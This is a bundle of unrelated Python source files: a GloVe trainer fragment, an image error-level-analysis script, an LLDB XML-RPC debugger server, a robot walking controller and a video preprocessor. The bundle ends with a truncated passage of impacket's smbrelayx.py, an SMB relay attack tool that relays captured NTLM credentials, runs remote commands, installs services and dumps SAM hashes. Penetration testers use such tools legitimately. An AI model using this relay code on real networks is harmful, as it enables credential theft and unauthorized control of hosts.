arguments = [ (coo_list[rank*len(coo_list)//num_procs:(rank+1)*len(coo_list)//num_procs], self.Warr, self.Garr, self.shape, cost_list[rank], count_list[rank], x_max, alpha, learning_rate) for rank in range(num_procs)]
procs = [mp.Process(target=glove_compute_and_update_grads, args=arguments[rank]) for rank in range(num_procs)]
[proc.start() for proc in procs]
[proc.join() for proc in procs]
cost = 0
count = 0
for i in range(num_procs):
cost += cost_list[i].value
count += count_list[i].value
history['loss'].append(cost/count)
if verbose:
print("loss = %f" % history['loss'][-1])
self.word_vector = self.W[0] + self.W[1]
return history
def most_similar(self, word, number=5):
wid = self.word_to_wid[word]
word_vec = self.word_vector[wid]
dst = (np.dot(self.word_vector, word_vec)
/ np.linalg.norm(self.word_vector, axis=1)
/ np.linalg.norm(word_vec))
word_ids = np.argsort(-dst)
return [(self.wid_to_word[x], dst[x]) for x in word_ids[:number] if x in self.wid_to_word][1:]
|
ela.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 31 14:19:23 2018
@author: opensource
"""
from __future__ import print_function
from PIL import Image, ImageChops, ImageEnhance
import sys, os
import threading
import argparse
parser = argparse.ArgumentParser(description="""
Performs Error Level Analysis over a directory of images
""")
parser.add_argument('--dir', dest='directory', required=True,
help='path to the directory containing the images')
parser.add_argument('--quality', dest='quality',
help='quality used by the jpeg crompression alg.',
default=90)
TMP_EXT = ".tmp_ela.jpg"
ELA_EXT = ".ela.png"
SAVE_REL_DIR = "generated"
threads = []
quality = 90
def ela(fname, orig_dir, save_dir):
"""
Generates an ELA image on save_dir.
Params:
fname: filename w/out path
orig_dir: origin path
save_dir: save path
"""
basename, ext = os.path.splitext(fname)
org_fname = os.path.join(orig_dir, fname)
tmp_fname = os.path.join(save_dir, basename + TMP_EXT)
ela_fname = os.path.join(save_dir, basename + ELA_EXT)
im = Image.open(org_fname)
im.save(tmp_fname, 'JPEG', quality=quality)
tmp_fname_im = Image.open(tmp_fname)
ela_im = ImageChops.difference(im, tmp_fname_im)
extrema = ela_im.getextrema()
max_diff = max([ex[1] for ex in extrema])
scale = 255.0/max_diff
ela_im = ImageEnhance.Brightness(ela_im).enhance(scale)
ela_im.save(ela_fname)
os.remove(tmp_fname)
def main ():
args = parser.parse_args()
dirc = args.directory
quality = args.quality
ela_dirc = os.path.join(dirc, SAVE_REL_DIR)
print("Performing ELA on images at %s" % dirc)
if not os.path.exists(ela_dirc):
os.makedirs(ela_dirc)
for d in os.listdir(dirc):
if d.endswith(".jpg") or d.endswith(".jpeg"):
thread = threading.Thread(target=ela, args=[d, dirc, ela_dirc])
threads.append(thread)
thread.start()
for t in threads:
t.join()
print("Finished!")
print("Head to %s/%s to check the results!" % (dirc, SAVE_REL_DIR))
if __name__ == '__main__':
main()
else:
print("This should'nt be imported.", file=sys.stderr)
sys.exit(1)
|
lldb_server.py
|
#!/usr/bin/python
from __future__ import print_function
from SimpleXMLRPCServer import SimpleXMLRPCServer
import sys
import threading
if len(sys.argv) < 2:
print("Usage: {} <lldb_python_path> [port]".format(sys.argv[0]))
lldb_path = '/Library/Developer/Toolchains/swift-latest.xctoolchain/System/Library/PrivateFrameworks/LLDB.framework/Resources/Python'
port = 12597
# sys.exit(1)
elif len(sys.argv) == 2:
lldb_path = sys.argv[1]
port = 12597
elif len(sys.argv) == 3:
lldb_path = sys.argv[1]
port = int(sys.argv[2])
print("Running with Python module path {} on localhost:{}...".format(lldb_path, port))
sys.path.insert(1, lldb_path)
from lldb import *
server = None
target = None
process = None
stop_event_listener = None
out_event_listener = None
stdout_buffer = ""
stderr_buffer = ""
status = "unknown"
breakpoint_status = {}
lldb_handle = SBDebugger.Create()
lldb_handle.SetAsync(True)
# Internal
def _get_stop_reason(thread):
reason = thread.GetStopReason()
if reason == eStopReasonBreakpoint:
return "breakpoint"
elif reason == eStopReasonWatchpoint:
return "watchpoint"
elif reason == eStopReasonSignal:
return "signal"
elif reason == eStopReasonException:
return "exception"
elif reason == eStopReasonInvalid:
return "invalid"
elif reason == eStopReasonNone:
return "none"
elif reason == eStopReasonTrace:
return "trace"
elif reason == eStopReasonExec:
return "exec"
elif reason == eStopReasonPlanComplete:
return "plan_complete"
elif reason == eStopReasonThreadExiting:
return "thread_exit"
elif reason == eStopReasonInstrumentation:
return "instrumentation"
return "running"
def _get_status(process):
state = process.GetState()
if state == eStateInvalid:
return "invalid"
elif state == eStateUnloaded:
return "unloaded"
elif state == eStateConnected:
return "connected"
elif state == eStateAttaching:
return "attaching"
elif state == eStateDetached:
return "detached"
elif status == eStateSuspended:
return "suspended"
elif state == eStateLaunching:
return "launching"
elif state == eStateRunning:
return "running"
elif state == eStateStopped:
s = set()
for thread in process.threads:
s.add(_get_stop_reason(thread))
return "stopped," + (",".join(list(s)))
elif state == eStateStepping:
return "stepping"
elif state == eStateCrashed:
return "crashed"
elif state == eStateExited:
return "exited"
else:
return "unknown " + str(state)
def _stop_event():
global status
event = SBEvent()
broadcaster = process.GetBroadcaster()
while True:
if not stop_event_listener:
return
if stop_event_listener.WaitForEventForBroadcasterWithType(1, broadcaster, SBProcess.eBroadcastBitStateChanged, event):
status = _get_status(process)
def _output_event():
global stderr_buffer, stdout_buffer
event = SBEvent()
broadcaster = process.GetBroadcaster()
while True:
if not out_event_listener:
return
if out_event_listener.WaitForEventForBroadcasterWithType(1, broadcaster, SBProcess.eBroadcastBitSTDOUT | SBProcess.eBroadcastBitSTDERR, event):
if event.GetType() == 4:
result = process.GetSTDOUT(1024)
if result:
stdout_buffer += result
else:
stream = SBStream()
event.GetDescription(stream)
print("output event", stream.GetData())
print("stderr", process.GetSTDERR(1024))
def shutdown_server():
global server, out_event_listener, stop_event_listener
stop()
out_event_listener = None
stop_event_listener = None
SBDebugger.Destroy(lldb_handle)
server.server_close()
# load executable
def prepare(executable, params, environment, path, work_dir):
global target, process, stop_event_listener, out_event_listener, status
if not target:
target = lldb_handle.CreateTargetWithFileAndTargetTriple(executable, LLDB_ARCH_DEFAULT)
if not target:
raise Exception("Could not create target")
error = SBError()
process = target.Launch(lldb_handle.GetListener(), params, environment, None, None, None, work_dir, eLaunchFlagStopAtEntry, True, error)
if not error.Success():
raise Exception("Could not load target: " + str(error))
stop_event_listener = SBListener('stop_listener')
out_event_listener = SBListener('output_listener')
broadcaster = process.GetBroadcaster()
if not broadcaster.AddListener(stop_event_listener, SBProcess.eBroadcastBitStateChanged):
raise Exception("Could not add stop listener")
if not broadcaster.AddListener(out_event_listener, SBProcess.eBroadcastBitSTDOUT | SBProcess.eBroadcastBitSTDERR):
raise Exception("Could not add out listener")
threading.Thread(target=_stop_event, name='stop_event_listener', args=()).start()
threading.Thread(target=_output_event, name='output_event_listener', args=()).start()
status = _get_status(process)
# running, interrupting and stepping
def start():
global process
if not process:
raise Exception("No process to run")
error = process.Continue()
if not error.Success():
raise Exception("Could not continue: " + str(error))
def pause():
global process
if not process:
raise Exception("No process to pause")
error = process.Stop()
if not error.Success():
raise Exception("Could not continue: " + str(error))
def step_into():
global process
if not process:
raise Exception("No process to step")
thread = process.GetSelectedThread()
thread.StepInto()
def step_over():
global process
if not process:
raise Exception("No process to step")
thread = process.GetSelectedThread()
thread.StepOver()
def step_out():
global process
if not process:
raise Exception("No process to step")
thread = process.GetSelectedThread()
thread.StepOut()
def stop():
global process, stop_event_listener
if process:
error = process.Kill()
if not error.Success():
raise Exception("Could not stop: " + str(error))
process = None
# thread selection
def select_thread(id):
global process
if not process:
raise Exception("No process to work on")
return process.SetSelectedThreadByID(id)
def selected_thread():
global process
if not process:
raise Exception("No process to query")
thread = process.GetSelectedThread()
return _get_thread(thread)
# input/output to target
def get_stdout():
global stdout_buffer
buf = stdout_buffer
stdout_buffer = ""
return buf
def get_stderr():
global stderr_buffer
buf = stderr_buffer
stderr_buffer = ""
return buf
def push_stdin(data):
global process
if not process:
raise Exception("No process to send data to")
process.PutSTDIN(data)
# status and backtraces
def get_status():
global status
return status
def _get_backtrace(thread):
bt_frames = []
for frame in thread.frames:
addr = frame.GetPCAddress()
load_addr = addr.GetLoadAddress(target)
function = frame.GetFunction()
mod_name = frame.GetModule().GetFileSpec().GetFilename()
if function:
func_name = frame.GetFunctionName()
file_name = frame.GetLineEntry().GetFileSpec().fullpath
line_num = frame.GetLineEntry().GetLine()
col = frame.GetLineEntry().GetColumn()
inlined = frame.IsInlined()
args = {}
for variable in frame.get_arguments():
args[variable.GetName()] = variable.GetSummary()
bt_frames.append({
"address": str(load_addr), # number to big for rpc -.-
"module": mod_name,
"function": func_name,
"file": file_name,
"line": line_num,
"column": col,
"inlined": inlined,
"arguments": args
})
else:
symbol = frame.GetSymbol()
file_addr = addr.GetFileAddress()
start_addr = symbol.GetStartAddress().GetFileAddress()
symbol_name = symbol.GetName()
symbol_offset = file_addr - start_addr
bt_frames.append({
"address": str(load_addr), # number to big for rpc -.-
"module": mod_name,
"symbol": symbol_name,
"offset": str(symbol_offset), # number to big for rpc -.-
})
return bt_frames
def get_backtrace():
global process
if not process:
raise Exception("No process to get traces of")
bt = {}
for thread in process.threads:
bt[str(thread.GetThreadID())] = _get_thread(thread)
bt[str(thread.GetThreadID())]['bt'] = _get_backtrace(thread)
return bt
def get_backtrace_for_selected_thread():
global process
if not process:
raise Exception("No process to get traces of")
thread = process.GetSelectedThread()
bt = _get_thread(thread)
bt['bt'] = _get_backtrace(thread)
return bt
def _get_thread(thread):
selected_thread = process.GetSelectedThread()
selected = (thread.id == selected_thread.id)
return {
"id": str(thread.id),
"index": thread.idx,
"name": thread.name,
"queue": thread.queue,
"stop_reason": _get_stop_reason(thread),
"num_frames": thread.GetNumFrames(),
"selected": selected
}
def get_threads():
global process
if not process:
raise Exception("No process to query")
threads = []
for thread in process.threads:
threads.append(_get_thread(thread))
return threads
def get_arguments(thread_id, frame_index):
global process
if not process:
raise Exception("No process to query")
thread = process.GetThreadByID(int(thread_id))
frame = thread.frame[frame_index]
result = {}
for variable in frame.get_arguments():
result[variable.GetName()] = variable.GetSummary()
return result
def get_local_variables(thread_id, frame_index):
global process
if not process:
raise Exception("No process to query")
thread = process.GetThreadByID(int(thread_id))
frame = thread.frame[frame_index]
result = {}
for variable in frame.get_locals():
result[variable.GetName()] = str(variable.GetSummary())
for variable in frame.get_statics():
result[variable.GetName()] = str(variable.GetSummary())
return result
def get_all_variables(thread_id, frame_index):
global process
if not process:
raise Exception("No process to query")
thread = process.GetThreadByID(int(thread_id))
frame = thread.frame[frame_index]
result = {}
for variable in frame.get_all_variables():
result[variable.GetName()] = str(variable.GetSummary())
return result
# execute arbitrary command
def execute_lldb_command(command):
interpreter = lldb_handle.GetCommandInterpreter()
res = SBCommandReturnObject()
interpreter.HandleCommand(command, res)
return {
"succeeded": res.Succeeded(),
"output": res.GetOutput(),
"error": res.GetError()
}
# breakpoints
def get_breakpoints():
global target
if not target:
raise Exception("No target")
breakpoints = []
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
loc = bp.GetLocationAtIndex(0).GetAddress().GetLineEntry()
breakpoints.append({
"file": loc.file.fullpath,
"line": loc.GetLine(),
"enabled": bp.IsEnabled(),
"condition": bp.GetCondition(),
"ignore_count": bp.GetIgnoreCount(),
"id": bp.id
})
return breakpoints
def set_breakpoint(filename, line_number, condition, ignore_count):
global target
if not target:
raise Exception("No target")
bp = target.BreakpointCreateByLocation(filename, line_number)
if condition:
bp.SetCondition(condition)
if ignore_count:
bp.SetIgnoreCount(ignore_count)
return bp.id
def delete_breakpoint(id):
global target
if not target:
raise Exception("No target")
target.BreakpointDelete(id)
def enable_breakpoint(id):
global target
if not target:
raise Exception("No target")
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
if bp.id == id:
bp.SetEnabled(True)
break
def disable_breakpoint(id):
global target
if not target:
raise Exception("No target")
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
if bp.id == id:
bp.SetEnabled(False)
break
def disable_all_breakpoints():
global target
if not target:
raise Exception("No target")
target.DisableAllBreakpoints()
def enable_all_breakpoints():
global target
if not target:
raise Exception("No target")
target.EnableAllBreakpoints()
def delete_all_breakpoints():
global target
if not target:
raise Exception("No target")
target.DeleteAllBreakpoints()
def disable_breakpoints():
global target, breakpoint_status
if not target:
raise Exception("No target")
if len(breakpoint_status) > 0:
return
breakpoint_status = {}
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
breakpoint_status[str(bp.id)] = bp.IsEnabled()
disable_all_breakpoints()
def enable_breakpoints():
global target, breakpoint_status
if not target:
raise Exception("No target")
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
if breakpoint_status[str(bp.id)]:
enable_breakpoint(bp.id)
breakpoint_status = {}
#
# XMLRPC server
#
server = SimpleXMLRPCServer(("localhost", port), logRequests=False, allow_none=True)
server.register_introspection_functions()
# kill server
server.register_function(shutdown_server)
# load executable
server.register_function(prepare)
# start/stop/pause/step
server.register_function(start)
server.register_function(pause)
server.register_function(step_into)
server.register_function(step_over)
server.register_function(step_out)
server.register_function(stop)
# thread info
server.register_function(get_threads)
server.register_function(select_thread)
server.register_function(selected_thread)
# input/output
server.register_function(get_stdout)
server.register_function(get_stderr)
server.register_function(push_stdin)
# status
server.register_function(get_status)
server.register_function(get_backtrace)
server.register_function(get_backtrace_for_selected_thread)
# exec command
server.register_function(execute_lldb_command)
# get variables
server.register_function(get_arguments)
server.register_function(get_local_variables)
server.register_function(get_all_variables)
# breakpoint handling
server.register_function(get_breakpoints)
server.register_function(set_breakpoint)
server.register_function(delete_breakpoint)
server.register_function(enable_breakpoint)
server.register_function(disable_breakpoint)
server.register_function(disable_all_breakpoints)
server.register_function(enable_all_breakpoints)
server.register_function(delete_all_breakpoints)
server.register_function(disable_breakpoints)
server.register_function(enable_breakpoints)
try:
server.serve_forever()
except KeyboardInterrupt:
shutdown_server()
sys.exit(0)
except Exception:
sys.exit(0)
|
walk_front.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import pypot.robot
import time
import json
import math
import sys
import threading
import time
import queue
from serial import Serial
def dist(a,b):
return math.sqrt((a*a)+(b*b))
def get_y_rotation(x,y,z):
radians = math.atan2(x, dist(y,z))
return -math.degrees(radians)
def get_x_rotation(x,y,z):
radians = math.atan2(y, dist(x,z))
return math.degrees(radians)
def read_kbd_input(inputQueue):
print('Ready for keyboard input:')
while True:
inputQueue.put(sys.stdin.read(1))
def interp(a, x1, x2):
return x1+a*(x2-x1)
def interpInv(x, x1, x2):
return (x-x1)/(x2-x1)
def MGD(theta2):
c = math.cos(theta2)
s = math.sin(theta2)
xA = 0.0
yA = 0.047
xB = 0.094
yB = 0.000
L2 = 0.13350
L3 = 0.10522
L4 = 0.13269
L5 = 0.13287
xC = xB+L2*c
yC = yB+L2*s
AC = math.sqrt((xA-xC)**2+(yA-yC)**2)
AH = min((L4**2-L3**2+AC**2)/(2*AC),L4)
HD = math.sqrt(L4**2-AH**2)
xH = xA+AH*(xC-xA)/AC
yH = yA+AH*(yC-yA)/AC
xD = xH-HD*(yC-yA)/AC
yD = yH+HD*(xC-xA)/AC
xF = xC+L5*(xC-xD)/L3
yF = yC+L5*(yC-yD)/L3
return math.atan((yF-yC)/(xF-xC))*180.0/math.pi, math.atan(yF/xF)*180.0/math.pi
lapin = pypot.robot.from_json('confLapinMarkIII.json')
PS = Serial('/dev/serial0',115200,timeout=0.1)
PS.flushInput()
info = {}
alpha = 0 # positif quand on ecarte
theta = 0 # negatif vers l'avant
aLc = 0 # repos à -40, extension à 30
aRc = 0 # repos à -40, extension à 30
ankleOffset = 5
compliant = True
speed = 100
state = 0
xLeft=0
xRight=0
KP = 10
KI = 5
rythme=1
srythme=10
inputQueue = queue.Queue()
inputThread = threading.Thread(target=read_kbd_input, args=(inputQueue,), daemon=True)
inputThread.start()
count = 0
last_update = time.time()
t0 = time.time()
while True:
if (inputQueue.qsize() > 0):
c = inputQueue.get()
if c=='q':
break
if c=='a':
state = -1
# mesures
# mesure de la temperature
temp = 0
for mot in lapin.motors:
temp = max(temp, mot.present_temperature)
if temp >60:
print("HOT!")
# recuperation des capteurs
PS.write(b"A")
out = PS.readline()
try:
info = json.loads(out)
except:
pass
print(info)
print(str(temp)+'°C\t'+str(state))
print(lapin.l_ankle_y.present_position)
if info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"]>80:
rbalance = (info["RF"]["F"]+info["RB"]["F"])/(info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"])
onGround = True
else:
rbalance=0.5
onGround = False
roll = 0.0#info["GYR"]["X"]
print("rbalance: "+str(rbalance))
print("roll rate: "+str(roll))
ecart = 10
avan = 20
# machine a etat
if state == 0:
alpha = ecart
theta = avan
aLc = 0.9
aRc = 0.9
speed = 100
compliant = False
if rbalance>0.5:
state = 1
elif state == 1:
alpha = ecart
theta = -avan
aLc = 0.9
aRc = 0.9
speed = 100
compliant = False
if rbalance<0.5:
state = 0
elif state == -1:
alpha = 0
theta = 0
aLc = 0.5
aRc = 0.5
speed = 10
compliant = True
# actionneurs
(aFr,lFr) = MGD((90-lapin.r_knee_y.present_position)*math.pi/180.0)
(aFl,lFl) = MGD((90-lapin.l_knee_y.present_position)*math.pi/180.0)
lapin.r_hip_x.pid = (KP,KI,0)
lapin.r_hip_x.compliant = compliant
lapin.r_hip_x.goal_position = alpha/2
lapin.r_hip_x.moving_speed = speed
lapin.l_hip_x.pid = (KP,KI,0)
lapin.l_hip_x.compliant = compliant
lapin.l_hip_x.goal_position = alpha/2
lapin.l_hip_x.moving_speed = speed
lapin.r_hip_y.compliant = compliant
lapin.r_hip_y.goal_position = 0-theta/2
lapin.r_hip_y.moving_speed = 0
lapin.l_hip_y.compliant = compliant
lapin.l_hip_y.goal_position = 0+theta/2
lapin.l_hip_y.moving_speed = speed
lapin.r_knee_y.pid = (KP,KI,0)
lapin.r_knee_y.compliant = compliant
lapin.r_knee_y.goal_position = interp(aRc, -23, 90)
lapin.r_knee_y.moving_speed = speed
lapin.l_knee_y.pid = (KP,KI,0)
lapin.l_knee_y.compliant = compliant
lapin.l_knee_y.goal_position = interp(aLc, -23, 90)
lapin.l_knee_y.moving_speed = speed
lapin.r_ankle_y.compliant = True#compliant
lapin.r_ankle_y.goal_position = aFr-lFr+ankleOffset
lapin.r_ankle_y.moving_speed = speed
lapin.l_ankle_y.compliant = True#compliant
lapin.l_ankle_y.goal_position = aFl-lFl+ankleOffset
lapin.l_ankle_y.moving_speed = speed
time.sleep(0.005)
for mot in lapin.motors:
mot.compliant = True
time.sleep(0.04)
lapin.close()
|
Prepocesser.py
|
import sys
import socket
import traceback
import cv2
from imutils.video import VideoStream
import imagezmq
import threading
import numpy as np
#from time import sleep
import time
import videoStramSubscriber as vss
import cv2
import parameters
import sys
from nacl.signing import VerifyKey
class Preprocesser:
def __init__(self, receiver, vk, merkle_tree_interval, minimum_receive_rate_from_contractor):
self.receiver = receiver
self._stop = False
self._data_ready2 = threading.Event()
self._thread2 = threading.Thread(target=self._run2, args=(vk, merkle_tree_interval, minimum_receive_rate_from_contractor))
self._thread2.daemon = True
self._thread2.start()
def receive(self, timeout=45.0):
#a = 0
#waited = False
#if not self._data_ready.is_set() :
#a = time.perf_counter()
#waited = True
flag = self._data_ready2.wait(timeout=timeout)
if not flag:
raise TimeoutError(
"Contract aborted: Outsourcer at tcp://{}:{}".format(self.hostname, self.port) + 'timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review')
#if waited :
#print('Waited', (time.perf_counter() - a)*1000)
self._data_ready2.clear()
return self._data
def _run2(self, vk, merkle_tree_interval, minimum_receive_rate_from_contractor):
#receiver = imagezmq.ImageHub("tcp://{}:{}".format(self.hostname, self.port), REQ_REP=False)
#countera = 0
#counterb = 0
while not self._stop:
#self._data = receiver.receive()
print('here')
name, compressed = self.receiver.receive()
print('here2')
if name == 'abort':
sys.exit('Contract aborted by outsourcer according to custom')
received_time = time.perf_counter()
# decompress image
decompressedImage = cv2.imdecode(
np.frombuffer(compressed, dtype='uint8'), -1)
# endregion
decompressed_time = time.perf_counter()
# verify image (verify if signature matches image, contract hash and image count, and number of outptuts received)
if merkle_tree_interval == 0:
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-2]) + bytes(name[-1]), bytes(name[:-2]))
except:
sys.exit(
'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review')
# print(vrification_result)
if name[-1] < (image_count-2)*minimum_receive_rate_from_contractor:
sys.exit(
'Contract aborted: Outsourcer did not acknowledge enough ouputs. Possible Consquences for Outsourcer: Blacklist, Bad Review')
else:
# verify if signature matches image, contract hash, and image count, and number of intervals, and random number
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-5]) + bytes(name[-4]) + bytes(name[-3]) + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-5]))
except:
sys.exit(
'Contract aborted: Outsourcer signature does not match input. Possible Consquences for Outsourcer: Blacklist, Bad Review')
if name[-4] < (image_count-2)*minimum_receive_rate_from_contractor:
sys.exit(
'Contract aborted: Outsourcer did not acknowledge enough ouputs. Possible Consquences for Outsourcer: Blacklist, Bad Review')
outsorucer_signature = name[:-5]
outsourcer_image_count = name[-5]
outsourcer_number_of_outputs_received = name[-4]
outsourcer_random_number = name[-3]
outsourcer_interval_count = name[-2]
outsourcer_time_to_challenge = bool(name[-1])
print('here2')
#print(name[-2], image_count, name[-3])
verify_time = time.perf_counter()
# image preprocessing
# region
original_image = cv2.cvtColor(decompressedImage, cv2.COLOR_BGR2RGB)
image_data = cv2.resize(
original_image, (input_size, input_size)) # 0.4ms
image_data = image_data / 255. # 2.53ms
images_data = []
for i in range(1):
images_data.append(image_data)
images_data = np.asarray(images_data).astype(np.float32) # 3.15ms
# endregion
image_preprocessing_time = time.perf_counter()
print('here3')
self._data = (images_data, name)
#countera += 1
#print(countera)
#f = time.perf_counter()
#time.sleep(0.05)
#counterb += 1
#print(counterb, time.perf_counter() - f)
self._data_ready2.set()
receiver.close()
def close(self):
self._stop = True
# Simulating heavy processing load
def limit_to_2_fps():
sleep(0.5)
|
smbrelayx.py
|
#!/usr/bin/env python
# Copyright (c) 2013-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the smbclient portion. It is supposed to be
# working on any LM Compatibility level. The only way to stop this attack
# is to enforce on the server SPN checks and or signing.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the targets succeed, the client authentication
# success as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
import ConfigParser
import SimpleHTTPServer
import SocketServer
import argparse
import base64
import logging
import os
import sys
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Crypto.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need PyCrypto")
logging.critical("See http://www.pycrypto.org/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = ''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print self.__answerTMP.decode(CODEC)
except UnicodeDecodeError, e:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html\nand then execute wmiexec.py '
'again with -codec and the corresponding codec')
print self.__answerTMP
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = str(user)
sessionSetup['Data']['PrimaryDomain'] = str(domain)
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
